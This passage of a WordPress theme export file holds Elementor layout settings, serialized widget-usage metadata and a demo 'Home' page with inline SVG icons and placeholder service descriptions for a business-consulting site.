management","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"2f35702","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/project-management\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"support functions","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"6aee619","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/support-function\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"finance planning","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"cd97531","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/finance-planning\/","is_external":"","nofollow":"","custom_attributes":""}}],"space_between":{"unit":"px","size":15,"sizes":[]},"icon_color":"#D92300","icon_size":{"unit":"px","size":6,"sizes":[]},"text_color":"#1B1D21","text_color_hover":"#D92300","text_indent":{"unit":"px","size":10,"sizes":[]},"icon_typography_typography":"custom","icon_typography_font_family":"Inter","icon_typography_font_size":{"unit":"px","size":13,"sizes":[]},"icon_typography_font_weight":"600","icon_typography_text_transform":"uppercase","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"6f19085","elType":"widget","settings":{"title":"Contacts","header_size":"h5"},"elements":[],"widgetType":"heading"},{"id":"2d46fdb","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"5","left":"0","isLinked":false}},"elements":[{"id":"d5f2cb2","elType":"column","settings":{"_column_size":50,"_inline_size":78,"_inline_size_mobile":78},"elements":[{"id":"6e86112","elType":"widget","settings":{"text":"Divider","color":"#00000026","gap":{"unit":"px","size":20,"sizes":[]},"_css_classes":"widget-title"},"elements":[],"widgetType":"divider"}],"isInner":true},{"id":"6c1bc64","elType":"column","settings":{"_column_size":50,"_inline_size":22,"_inline_size_mobile":22},"elements":[{"id":"b727cfc","elType":"widget","settings":{"text":"Divider","color":"#D92300","weight":{"unit":"px","size":3,"sizes":[]},"gap":{"unit":"px","size":21,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"17","isLinked":false}},"elements":[],"widgetType":"divider"}],"isInner":true}],"isInner":true},{"id":"49fcb72","elType":"widget","settings":{"title_text":"Visit Us Daily","description_text":"411 University St, Seattle","position":"left","title_size":"h6","primary_color":"#D92300","icon_size":{"unit":"px","size":18,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":347},"library":"svg"},"title_color":"#1B1D21","title_typography_font_family":"Inter","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"0","right":"0","bottom":"16","left":"0","isLinked":false},"icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","icon_space_mobile":{"unit":"px","size":5,"sizes":[]},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"52b73d5","elType":"widget","settings":{"title_text":"Have Any Questions?","description_text":"+1-800-456-478-23","position":"left","title_size":"h6","primary_color":"#D92300","icon_size":{"unit":"px","size":18,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":345},"library":"svg"},"title_color":"#1B1D21","title_typography_font_family":"Inter","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"0","right":"0","bottom":"16","left":"0","isLinked":false},"icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""},"icon_space_mobile":{"unit":"px","size":5,"sizes":[]},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"4307bab","elType":"widget","settings":{"title_text":"Mail Us","description_text":"maxbizz@mail.com","position":"left","title_size":"h6","primary_color":"#D92300","icon_size":{"unit":"px","size":18,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/send.svg","id":374},"library":"svg"},"title_color":"#1B1D21","title_typography_font_family":"Inter","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","link":{"url":"mailto:maxbizz@mail.com","is_external":"","nofollow":"","custom_attributes":""},"icon_space_mobile":{"unit":"px","size":5,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"ec48b7f","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/img-btn-pdf-home3.jpg","id":1705},"image_size":"full","align":"left","link_to":"custom","link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"b0b60e1","elType":"section","settings":{"content_width":{"unit":"px","size":1370,"sizes":[]},"margin":{"unit":"px","top":"-75","right":0,"bottom":"-75","left":0,"isLinked":false},"margin_tablet":{"unit":"px","top":"-20","right":0,"bottom":"-75","left":0,"isLinked":false},"z_index":1,"margin_mobile":{"unit":"px","top":"-60","right":0,"bottom":"60","left":0,"isLinked":false}},"elements":[{"id":"6149192","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"63de8f6","elType":"section","settings":{"content_position":"middle","structure":"20","background_background":"classic","background_color":"#D92300","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":8,"vertical":8,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"},"padding":{"unit":"px","top":"50","right":"45","bottom":"50","left":"45","isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":0,"bottom":"0","left":0,"isLinked":false},"padding_mobile":{"unit":"px","top":"40","right":"20","bottom":"40","left":"20","isLinked":false}},"elements":[{"id":"611674c","elType":"column","settings":{"_column_size":50,"_inline_size":30,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[{"id":"7b0010f","elType":"widget","settings":{"title":"Ready to Get Started?","header_size":"h4","title_color":"#FFFFFF","typography_font_weight":"600","typography_font_size_mobile":{"unit":"px","size":22,"sizes":[]}},"elements":[],"widgetType":"heading"}],"isInner":true},{"id":"5245aa9","elType":"column","settings":{"_column_size":50,"_inline_size":70,"_inline_size_tablet":100},"elements":[{"id":"8a69874","elType":"widget","settings":{"cf7":"741","_background_background":"classic","_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_border_radius_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"css_responce":"color:#fff;"},"elements":[],"widgetType":"ictf7"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:10:{s:5:"image";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:5:{s:5:"image";i:3;s:10:"image_size";i:3;s:5:"align";i:1;s:7:"link_to";i:1;s:4:"link";i:1;}}s:5:"style";a:1:{s:19:"section_style_image";a:2:{s:19:"image_border_radius";i:2;s:5:"width";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_mobile";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:6;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:6;s:11:"header_size";i:6;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:3;}}s:5:"style";a:1:{s:19:"section_title_style";a:4:{s:21:"typography_typography";i:1;s:27:"typography_font_size_mobile";i:2;s:22:"typography_font_weight";i:2;s:11:"title_color";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:5;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:5;}}s:8:"advanced";a:2:{s:14:"_section_style";a:4:{s:8:"_padding";i:4;s:15:"_padding_mobile";i:2;s:7:"_margin";i:2;s:12:"_css_classes";i:1;}s:15:"_section_border";a:3:{s:14:"_border_border";i:1;s:13:"_border_width";i:1;s:13:"_border_color";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:5:{s:10:"text_color";i:1;s:22:"typography_font_family";i:1;s:22:"typography_font_weight";i:1;s:21:"typography_typography";i:1;s:27:"typography_font_size_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:3;s:5:"title";i:3;s:7:"percent";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_mobile";i:2;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:3;}}}}s:6:"column";a:3:{s:5:"count";i:16;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:16;s:19:"_inline_size_tablet";i:4;s:19:"_inline_size_mobile";i:4;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:1:{s:13:"margin_tablet";i:2;}}}}s:7:"section";a:3:{s:5:"count";i:9;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:4:{s:3:"gap";i:6;s:6:"layout";i:5;s:16:"content_position";i:1;s:13:"content_width";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:6;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:7:{s:7:"padding";i:6;s:14:"padding_mobile";i:3;s:6:"margin";i:3;s:13:"margin_mobile";i:3;s:14:"padding_tablet";i:1;s:13:"margin_tablet";i:2;s:7:"z_index";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}s:5:"style";a:2:{s:18:"section_background";a:6:{s:21:"background_background";i:3;s:16:"background_image";i:1;s:19:"background_position";i:1;s:17:"background_repeat";i:1;s:15:"background_size";i:1;s:16:"background_color";i:2;}s:14:"section_border";a:3:{s:13:"border_radius";i:3;s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:2;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:2;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:2;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:2;s:9:"icon_size";i:2;}s:18:"section_text_style";a:8:{s:11:"text_indent";i:2;s:10:"text_color";i:1;s:16:"text_color_hover";i:1;s:26:"icon_typography_typography";i:1;s:27:"icon_typography_font_family";i:1;s:25:"icon_typography_font_size";i:1;s:27:"icon_typography_font_weight";i:1;s:30:"icon_typography_text_transform";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:2;}}}}s:7:"divider";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:4;s:3:"gap";i:4;s:6:"weight";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:12:"_css_classes";i:2;s:7:"_margin";i:2;}}}}s:8:"icon-box";a:3:{s:5:"count";i:3;s:15:"control_percent";i:9;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:6:{s:10:"title_text";i:3;s:16:"description_text";i:3;s:8:"position";i:3;s:10:"title_size";i:3;s:13:"selected_icon";i:3;s:4:"link";i:2;}}s:5:"style";a:2:{s:18:"section_style_icon";a:5:{s:13:"primary_color";i:3;s:9:"icon_size";i:3;s:6:"rotate";i:3;s:10:"icon_space";i:3;s:17:"icon_space_mobile";i:3;}s:21:"section_style_content";a:12:{s:18:"title_bottom_space";i:3;s:27:"title_typography_typography";i:3;s:26:"title_typography_font_size";i:3;s:28:"title_typography_font_weight";i:3;s:33:"description_typography_typography";i:3;s:32:"description_typography_font_size";i:3;s:34:"description_typography_font_weight";i:3;s:11:"title_color";i:3;s:28:"title_typography_font_family";i:3;s:17:"description_color";i:3;s:34:"description_typography_font_family";i:3;s:17:"text_align_mobile";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:7:"_margin";i:3;s:14:"_margin_mobile";i:2;}}}}s:5:"ictf7";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"section_content";a:1:{s:3:"cf7";i:1;}}s:8:"advanced";a:2:{s:19:"_section_background";a:1:{s:22:"_background_background";i:1;}s:15:"_section_border";a:2:{s:14:"_border_radius";i:1;s:21:"_border_radius_tablet";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:1:{s:12:"css_responce";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[select_footer]]></wp:meta_key>
		<wp:meta_value><![CDATA[1921]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[2033]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Home</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/</link>
		<pubDate>Tue, 22 Sep 2020 03:28:53 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=1023</guid>
		<description></description>
		<content:encoded><![CDATA[[rev_slider alias="slider-1" slidertitle="Slider 1"][/rev_slider]		
		    	<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 512 512"><g><path d="m257.756 273.413c75.381 0 136.707-61.326 136.707-136.707 0-75.38-61.326-136.706-136.707-136.706s-136.707 61.326-136.707 136.706c0 75.381 61.327 136.707 136.707 136.707zm0-258.384c67.093 0 121.677 54.584 121.677 121.677s-54.584 121.678-121.677 121.678-121.678-54.584-121.678-121.678c0-67.092 54.585-121.677 121.678-121.677z"></path><path d="m257.755 235.574c54.516 0 98.868-44.352 98.868-98.867s-44.352-98.867-98.868-98.867c-24.609 0-48.193 9.099-66.407 25.621-3.074 2.789-3.305 7.541-.517 10.615 2.789 3.074 7.542 3.307 10.615.517 15.443-14.009 35.441-21.724 56.309-21.724 46.229 0 83.839 37.61 83.839 83.838s-37.61 83.838-83.839 83.838c-46.228 0-83.837-37.609-83.837-83.838 0-13.96 3.497-27.777 10.114-39.957 1.981-3.647.631-8.209-3.016-10.19-3.646-1.982-8.208-.63-10.19 3.016-7.809 14.375-11.937 30.673-11.937 47.131 0 54.515 44.351 98.867 98.866 98.867z"></path><path d="m254.898 172.111c-11.802-.719-15.044-7.822-15.645-9.491-.86-3.212-3.782-5.58-7.265-5.58-4.158 0-7.529 3.371-7.529 7.53 0 .604.079 1.188.213 1.751l-.003.001c.007.027.021.079.04.144.092.355.201.703.342 1.036 1.39 3.834 6.959 15.729 23.371 18.907v9.999c0 4.15 3.365 7.515 7.515 7.515 4.151 0 7.515-3.364 7.515-7.515v-9.773c7.193-1.252 12.025-4.396 15.046-7.239 5.621-5.29 8.977-13.286 8.977-21.39 0-7.615-2.986-25.655-30.649-28.707-5.48-.605-9.389-2.349-11.62-5.183-1.969-2.503-2.182-5.268-2.182-6.341 0-1.322.363-12.913 12.913-12.913 8.234 0 11.559 5.237 12.184 6.376 1.114 2.766 3.818 4.72 6.982 4.72 4.158 0 7.529-3.371 7.529-7.529 0-1.236-.304-2.4-.832-3.429l.004-.002c-2.118-4.604-8.099-11.807-18.353-14.287v-10.087c0-4.15-3.364-7.515-7.515-7.515-4.15 0-7.515 3.365-7.515 7.515v10.055c-14.832 3.522-20.428 17.361-20.428 27.095 0 10.823 7.119 24.248 27.183 26.462 17.268 1.906 17.268 10.835 17.268 13.769 0 3.117-1.115 7.498-4.247 10.445-2.961 2.787-7.433 4.019-13.299 3.661z"></path><path d="m130.238 347.994c-1.42-1.51-3.401-2.366-5.474-2.366s-4.053.856-5.474 2.366l-51.047 54.268c-2.054 2.184-2.613 5.379-1.424 8.13 1.189 2.752 3.9 4.533 6.898 4.533h14.754v27.289c0 4.15 3.365 7.515 7.515 7.515s7.515-3.365 7.515-7.515v-34.804c0-4.15-3.365-7.515-7.515-7.515h-4.884l33.661-35.786 33.661 35.786h-4.884c-4.15 0-7.515 3.365-7.515 7.515v89.56h-42.526v-24.697c0-4.15-3.365-7.515-7.515-7.515s-7.515 3.365-7.515 7.515v32.212c0 4.15 3.365 7.515 7.515 7.515h57.555c4.15 0 7.515-3.365 7.515-7.515v-89.56h14.754c2.997 0 5.708-1.781 6.898-4.533 1.189-2.751.63-5.947-1.424-8.13z"></path><path d="m263.229 296.294c-1.42-1.51-3.401-2.366-5.474-2.366s-4.053.856-5.474 2.366l-51.046 54.269c-2.054 2.184-2.614 5.379-1.424 8.13 1.189 2.752 3.9 4.533 6.898 4.533h14.754v141.259c0 4.15 3.365 7.515 7.515 7.515h57.555c4.151 0 7.515-3.365 7.515-7.515v-141.259h14.754c2.998 0 5.708-1.781 6.898-4.533 1.189-2.751.629-5.947-1.425-8.13zm23.304 51.903c-4.151 0-7.515 3.365-7.515 7.515v141.259h-42.526v-141.26c0-4.15-3.365-7.515-7.515-7.515h-4.884l33.661-35.786 33.661 35.786h-4.882z"></path><path d="m396.221 248.46c-1.42-1.51-3.401-2.366-5.474-2.366-2.072 0-4.054.856-5.474 2.366l-51.047 54.268c-2.054 2.183-2.614 5.379-1.425 8.13 1.19 2.752 3.9 4.533 6.898 4.533h14.754v45.859c0 4.15 3.364 7.515 7.515 7.515s7.515-3.365 7.515-7.515v-53.373c0-4.15-3.364-7.515-7.515-7.515h-4.883l33.661-35.786 33.66 35.786h-4.883c-4.151 0-7.515 3.365-7.515 7.515v189.094h-42.526v-105.662c0-4.15-3.364-7.515-7.515-7.515s-7.515 3.364-7.515 7.515v113.177c0 4.15 3.364 7.515 7.515 7.515h57.556c4.151 0 7.515-3.365 7.515-7.515v-189.095h14.754c2.998 0 5.708-1.781 6.898-4.533 1.189-2.751.629-5.947-1.425-8.13z"></path><path d="m92.805 139.396c0-4.15-3.365-7.515-7.515-7.515h-44.075c-4.15 0-7.515 3.365-7.515 7.515s3.364 7.515 7.515 7.515h44.075c4.151-.001 7.515-3.365 7.515-7.515z"></path><path d="m95.012 198.37-15.676 6.141c-3.865 1.514-5.77 5.874-4.256 9.738 1.161 2.964 3.997 4.775 6.999 4.775.912 0 1.839-.167 2.739-.52l15.676-6.141c3.865-1.514 5.77-5.874 4.256-9.738-1.515-3.863-5.875-5.769-9.738-4.255z"></path><path d="m79.336 74.279 15.676 6.141c.901.353 1.827.52 2.739.52 3.002 0 5.838-1.812 6.999-4.775 1.514-3.864-.391-8.224-4.256-9.738l-15.676-6.141c-3.866-1.514-8.224.392-9.738 4.256-1.514 3.863.392 8.223 4.256 9.737z"></path><path d="m470.785 131.881h-44.075c-4.151 0-7.515 3.365-7.515 7.515s3.364 7.515 7.515 7.515h44.075c4.151 0 7.515-3.365 7.515-7.515-.001-4.15-3.365-7.515-7.515-7.515z"></path><path d="m411.506 212.365 15.675 6.141c.901.353 1.828.52 2.74.52 3.002 0 5.838-1.812 6.999-4.775 1.514-3.864-.391-8.224-4.255-9.738l-15.675-6.141c-3.868-1.514-8.224.392-9.739 4.256-1.514 3.862.391 8.222 4.255 9.737z"></path><path d="m414.25 80.94c.912 0 1.84-.167 2.74-.52l15.675-6.141c3.864-1.514 5.769-5.874 4.255-9.738-1.515-3.865-5.876-5.768-9.739-4.256l-15.675 6.141c-3.864 1.514-5.769 5.874-4.255 9.738 1.161 2.965 3.997 4.776 6.999 4.776z"></path></g></svg>	        
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-business/our-services/finance-planning/">Financial Services</a></h5>				<p>We help financial institutions, from banking and insurance to wealth.</p>			
        			<a href="http://wpdemo.archiwp.com/maxbizz-business/our-services/finance-planning/"class="link-details"> Learn More</a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<path d="M436.275,39.807H304.797C300.155,17.119,280.039,0,256,0s-44.156,17.119-48.798,39.807H75.725    c-14.771,0-26.789,12.018-26.789,26.789V351.16c0,14.771,12.017,26.789,26.789,26.789H200.63l-40.566,120.866    c-1.757,5.235,1.063,10.904,6.299,12.662c1.055,0.354,2.128,0.522,3.183,0.522c4.179,0,8.076-2.641,9.479-6.821l42.702-127.229    h68.546l42.702,127.229c1.403,4.181,5.3,6.821,9.479,6.821c1.055,0,2.128-0.169,3.183-0.522c5.236-1.758,8.056-7.427,6.299-12.662    l-40.566-120.866h124.905c14.771,0,26.789-12.018,26.789-26.789V66.596C463.063,51.824,451.046,39.807,436.275,39.807z M256,20    c12.93,0,23.963,8.274,28.082,19.807h-56.163C232.038,28.274,243.071,20,256,20z M443.063,351.16c0,3.743-3.045,6.789-6.789,6.789    h-26.121v-142.56c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10V357.95H359.39V245.979c0-5.522-4.477-10-10-10    c-5.523,0-10,4.478-10,10v111.97h-28.084v-79.255c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v79.255h-25.308V253.277    c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v104.672h-29.037v-55.023c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v55.023    h-23.221v-50.985c0-5.522-4.477-10-10-10s-10,4.478-10,10v50.985h-26.777v-39.337c0-5.522-4.477-10-10-10s-10,4.478-10,10v39.337    h-31.24c-3.743,0-6.789-3.046-6.789-6.789V66.596c0-3.743,3.045-6.789,6.789-6.789h140.468h79.614h140.468    c3.743,0,6.789,3.046,6.789,6.789V351.16z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M410.105,106.884c-0.013-0.137-0.039-0.269-0.058-0.404c-0.026-0.188-0.049-0.377-0.086-0.564    c-0.031-0.158-0.075-0.312-0.114-0.467c-0.04-0.161-0.076-0.323-0.124-0.482c-0.046-0.153-0.104-0.301-0.158-0.451    c-0.056-0.158-0.109-0.317-0.173-0.473c-0.058-0.139-0.125-0.272-0.189-0.407c-0.075-0.161-0.147-0.323-0.231-0.48    c-0.068-0.127-0.146-0.249-0.22-0.373c-0.093-0.156-0.181-0.314-0.283-0.466c-0.089-0.134-0.19-0.259-0.285-0.388    c-0.098-0.133-0.191-0.268-0.297-0.397c-0.179-0.218-0.37-0.425-0.567-0.627c-0.033-0.033-0.06-0.07-0.093-0.103    c-0.032-0.032-0.068-0.059-0.1-0.09c-0.203-0.198-0.412-0.39-0.631-0.57c-0.122-0.1-0.25-0.188-0.376-0.281    c-0.136-0.102-0.269-0.207-0.41-0.302c-0.144-0.096-0.293-0.179-0.44-0.267c-0.133-0.08-0.264-0.163-0.401-0.237    c-0.146-0.078-0.296-0.144-0.445-0.214c-0.147-0.07-0.292-0.143-0.444-0.206c-0.141-0.058-0.285-0.105-0.427-0.156    c-0.166-0.06-0.329-0.123-0.499-0.174c-0.139-0.042-0.279-0.072-0.419-0.108c-0.176-0.045-0.35-0.094-0.53-0.129    c-0.156-0.031-0.314-0.049-0.471-0.072c-0.166-0.025-0.329-0.055-0.497-0.072c-0.267-0.026-0.535-0.036-0.804-0.041    c-0.06-0.001-0.118-0.009-0.178-0.009h-43.197c-5.523,0-10,4.478-10,10s4.477,10,10,10h19.054l-83.028,83.028l-21.797-21.798    c-1.875-1.875-4.419-2.929-7.071-2.929s-5.196,1.054-7.071,2.929l-72.161,72.162l-21.543-21.543    c-3.905-3.904-10.237-3.904-14.142,0l-36.492,36.492c-3.905,3.905-3.905,10.237,0,14.143c1.953,1.952,4.512,2.929,7.071,2.929    c2.559,0,5.119-0.977,7.071-2.929l29.42-29.421l21.543,21.542c3.905,3.904,10.237,3.904,14.142,0l72.161-72.161l21.797,21.798    c1.875,1.875,4.419,2.929,7.071,2.929s5.196-1.054,7.071-2.929l90.099-90.099v19.054c0,5.522,4.477,10,10,10    c5.523,0,10-4.478,10-10v-43.191C410.155,107.546,410.138,107.214,410.105,106.884z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="107.869" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="148.639" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="189.409" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-business/our-services/business-consulting/">Business Consulting</a></h5>				<p>We help financial institutions, from banking and insurance to wealth.</p>			
        			<a href="http://wpdemo.archiwp.com/maxbizz-business/our-services/business-consulting/"class="link-details"> Learn More</a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M489.129,42.371h-32.011V10c0-5.523-4.477-10-10-10s-10,4.477-10,10v38.237l-41.806,41.92    c-42.173-38.385-96.385-59.418-153.76-59.418c-61.083,0-118.511,23.787-161.703,66.979C36.657,140.91,12.87,198.338,12.87,259.421    s23.787,118.511,66.979,161.703c6.719,6.719,13.783,12.967,21.151,18.73l-55.074,55.074c-3.905,3.905-3.905,10.237,0,14.143    c1.953,1.952,4.512,2.929,7.071,2.929c2.559,0,5.119-0.977,7.071-2.929l57.452-57.453c36.629,23.742,79.348,36.485,124.031,36.485    c44.901,0,87.818-12.868,124.566-36.833l57.801,57.801c1.953,1.952,4.512,2.929,7.071,2.929c2.559,0,5.119-0.977,7.071-2.929    c3.905-3.905,3.906-10.237,0-14.143l-55.467-55.467c7.19-5.656,14.092-11.769,20.661-18.337    c43.192-43.192,66.979-100.62,66.979-161.703c0-34.789-7.614-68.199-22.63-99.303c-2.401-4.974-8.381-7.06-13.353-4.658    c-4.974,2.401-7.059,8.379-4.658,13.353c13.696,28.37,20.641,58.855,20.641,90.608c0,115.068-93.615,208.683-208.683,208.683    S32.867,374.49,32.867,259.421c0-115.068,93.615-208.683,208.683-208.683c52.045,0,101.242,18.958,139.627,53.59l-35.099,35.195    c-28.976-25.325-65.717-39.171-104.527-39.171c-87.711,0-159.069,71.358-159.069,159.069s71.36,159.069,159.071,159.069    s159.069-71.358,159.069-159.069c0-14.146-1.859-28.178-5.527-41.708c-6.436-23.746-18.393-45.726-34.797-64.125l42.276-42.391    c0.013-0.013,0.028-0.024,0.041-0.037c0.012-0.012,0.021-0.025,0.033-0.036l48.621-48.753h37.861c5.523,0,10-4.477,10-10    S494.652,42.371,489.129,42.371z M375.792,222.945c3.206,11.825,4.831,24.097,4.831,36.476    c0,76.683-62.386,139.069-139.069,139.069s-139.069-62.387-139.069-139.069s62.386-139.069,139.069-139.069    c33.479,0,65.202,11.779,90.375,33.362l-41.285,41.397c-13.628-10.428-30.644-16.643-49.09-16.643    c-44.637,0-80.953,36.315-80.953,80.953s36.315,80.953,80.953,80.953s80.953-36.315,80.953-80.953    c0-18.997-6.594-36.473-17.592-50.297l41.232-41.344C360.089,183.686,370.271,202.573,375.792,222.945z M235.828,264.236    c1.952,1.946,4.507,2.919,7.062,2.919c2.563,0,5.127-0.979,7.081-2.938l40.71-40.821c7.426,10.1,11.825,22.556,11.825,36.025    c0,33.609-27.343,60.953-60.953,60.953c-33.61,0-60.953-27.344-60.953-60.953s27.343-60.953,60.953-60.953    c12.935,0,24.933,4.062,34.81,10.961l-40.554,40.664C231.909,254.004,231.917,260.335,235.828,264.236z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="419.22" cy="133.64" r="10"></circle>
	</g>
</g>
